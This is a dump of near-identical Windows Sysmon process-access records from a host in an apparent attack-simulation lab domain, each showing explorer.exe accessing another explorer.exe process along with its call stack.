16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244999Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244998Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244997Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244996Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244995Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244994Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244993Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244992Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244991Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244990Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244989Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244988Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244987Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244986Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244985Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244984Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244983Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244982Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244981Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244980Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244979Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 